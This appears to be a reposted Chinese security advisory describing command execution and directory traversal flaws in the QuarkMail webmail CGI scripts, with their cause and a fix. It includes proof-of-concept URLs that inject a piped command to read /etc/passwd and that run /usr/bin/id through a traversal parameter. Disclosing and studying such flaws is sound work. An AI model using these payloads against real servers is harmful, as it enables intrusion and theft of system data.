QuarkMail get_att.cgi 命令执行漏洞

来源:互联网 发布:销售数据统计表 编辑:程序博客网 时间:2024/06/05 20:31
漏洞类型:
命令执行漏洞
网站组件:
QuarkMail
漏洞描述:

QuarkMail是国内一款非常流行的邮件系统,其存在命令执行漏洞,攻击者可以利用该漏洞,执行恶意系统命令。

快客电邮在访问“  http://mail.xxx.com/cgi-bin/web2cgi/get_att.cgi?up_attach=|cat%20/etc/passwd  ”这样的地址时,get_att.cgi没有过滤好,导致命令执行漏洞。

漏洞危害:

这个漏洞极易被攻击者利用,会导致网站数据库中的敏感数据被窃取,严重危害网站商业数据、用户信息的安全。

图:漏洞证明

解决方案:

1请访问其官方网站,下载并更新至QuarkMail的最新版本:http://www.ipmotor.com/。


---------------------------------------------------------------------------------------------------------------------------------

2011-03-15


漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系统,被广泛用于各个领域的电子邮件解决方案,其webmail部分使用perl cgi编写,但是80sec在其系统中发现一个重大的安全漏洞,导致远程用户可以在邮件系统上以当前进程身份执行任意命令,从而进一步控制主机或者系统。
  漏洞厂商:http://www.ipmotor.com/
  漏洞解析:QuarkMail错误地使用perl的open函数以打开文件,实现模板等功能,但是其对用户传入的参数没有做有效的过滤,从而导致一个命令执行漏洞。
  漏洞证明:登录进入系统之后访问如下URL
  http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../etc/passwd%00&id=2&sort=0&read_flag=yes
  即可得到系统账户文件,访问如下URL
  http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../usr/bin/id|%00&id=2&sort=0&read_flag=yes
  即可以将/usr/bin/id文件打开执行,并且将结果返回,用户就可以利用一序列操作获得系统的完整访问权。

原创粉丝点击